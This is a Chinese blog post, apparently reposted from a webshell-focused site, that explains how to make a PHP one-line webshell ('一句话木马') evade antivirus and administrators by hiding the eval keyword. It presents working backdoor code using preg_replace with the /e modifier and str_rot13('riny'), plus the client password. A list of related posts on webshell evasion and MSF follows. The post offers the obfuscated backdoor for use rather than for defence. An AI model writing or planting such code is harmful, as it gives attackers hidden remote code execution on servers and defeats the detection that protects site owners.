shell 免杀aspx_避开eval关键字,打造免杀一句话木马
这年头留个php一句话木马,随便就被杀了,但具我所知,杀软和运维人员杀的都是eval函数的关键字,只要避开关键字就能延长木马的寿命,但要怎么避开呢?
首先我想到的是将eval从字符串类型赋给一个变量。
如:$func = 'phpinfo';
$func();
这样的确是可以运行phpinfo()的,但是eval却不能通过这样来执行,我马上又想到了assert函数,他有着类似eval的功能,但效果并不理想,完全没有eval用着爽,而且也是公开了的,所以我也就将他放弃了。
还记得《20 Ways to Fuzzing PHP Source Code》里提到的preg_replace代码执行漏洞吗?
没错,利用preg_replace的模式修饰符e(PREG_REPLACE_EVAL)就可以将替换后的字符串作为php代码评估运行(eval函数方式)。
既然是将字符串作为php代码评估运行,哪么完全可以替换或者转码一下eval,这样就可以避开关键字了。
我的一句话木马如下:
($b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add');
使用上跟原来的一句话没有区别,可用常用的客户端连接密码b4dboy。
str_rot13('riny')即编码后的eval,完全避开了关键字,又不失效果。
转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/3202.html
shell 免杀aspx_避开eval关键字,打造免杀一句话木马相关推荐
- php eval一句话木马干啥的,eval函数简介与PHP一句话木马剖析
eval函数简介与PHP一句话木马剖析 大家好我是Carol,我的QQ是:906871417 一:eval函数 1.eval()函数把字符串按照PHP代码来计算. 2.该字符串必须是合法的PHP代码, ...
- php assert eval,代码执行函数之一句话木马
前言 大家好,我是阿里斯,一名IT行业小白.非常抱歉,昨天的内容出现瑕疵比较多,今天重新整理后再次发出,修改并添加了细节,另增加了常见的命令执行函数如果哪里不足,还请各位表哥指出. eval和asse ...
- 远程包含shell时,上传shell时所遇到一句话木马不能上传问题解决的办法(这里为单引号与双引号问题)
远程包含shell 需要allow_url_open=On,才可以尝试远程包含一句话木马: http://www.xxx.com/echo.txt, 代码如下. <?php fputs (fop ...
- MSF模拟渗透测试之一句话木马拿shell
MSF模拟渗透测试之一句话木马拿shell 文章目录 MSF模拟渗透测试之一句话木马拿shell 前言 一.利用命令执行漏洞,生成一句话木马文件 二.利用一句话木马拿shell 1.复制当前网址到蚁剑 ...
- shell 免杀aspx_对于asp免杀webshell的一些总结
0x00 前言 现在asp不多但是还是有,还是写一篇文章来简单的介绍下asp的免杀吧,相对于php我们的asp还是不够灵活,其中一些思路参考于LandGrey的文章 偷偷介绍下公众号:404安全 0x ...
- 科迅免杀php一句话_谈谈php一句话木马的免杀
文章最后更新时间为:2019年07月05日 00:17:52 一句话木马叱咤江湖这么多年还是如此活跃,我个人理解是,方便,相比于二进制后门或者大马,一句话木马足够短,容易上传,并且有众多客户端,菜刀, ...
- php后门绕过eval关键字,一些变态的PHP一句话后门收集
这类后门让网站.服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的.今天我们细数一些有意思的PHP一句话木马. 利用404页面隐藏PHP小马 ...
- PHP一句话木马免杀(通过VirusTotal测试)
PHP一句话木马免杀 仅用于学习与交流,请勿用于非法用途!!! 简介与思路 免杀技术全称为反杀毒技术Anti Anti- Virus简称"免杀",它指的是一种能使病毒木马免于被杀毒 ...
- PHP一句话木马免杀学习
PHP一句话木马免杀学习 简单了解php一句话木马原理 <?php @eval($_POST['shell']);?> 首先存在一个名为shell的变量,shell的取值为HTTP的POS ...
最新文章
- 看一遍就理解:MVCC原理详解
- java函数定义的要素_Java学习笔记八(方法)
- Office 365 Exchange 2016 混合部署前准备
- 不是keys,记一次因 redis 使用不当导致应用卡死 的过程
- 余额宝升级,限额限时解除,以后再也不用定闹钟抢破头了!
- 中小企业SaaS型软件BI的发展前景
- Arctic Network UVA - 10369 (最小生成树,适合prim)
- LeetCode-9.回文数(大括号+双目运算符使用)
- Oracle 11g及PLSQL可视化界面的安装与使用(内附软件)
- 技嘉服务器主板装系统,技嘉主板bios设置图解教程
- 概率逗号分号_分号的用法 和逗号的区别
- NOI2015 小园丁与老司机
- KNN(K临近算法)的简单模拟实现
- Tangents UVA - 10674 (求两个圆公切线的切点)
- 华为中兴为何对未来信心十足?
- 考研英国文学复习要点
- 2021年五一赛A题-疫苗生产优化问题
- faker和劫的图片_faker劫反杀ryu第一视角完整视频和gif,慢动作回放两个劫之间的较量分析...
- 6.087 Practical Programming in C, lec10
- (网络实验)基于Jnetpcap的网络嗅探器(抓包程序)设计与实现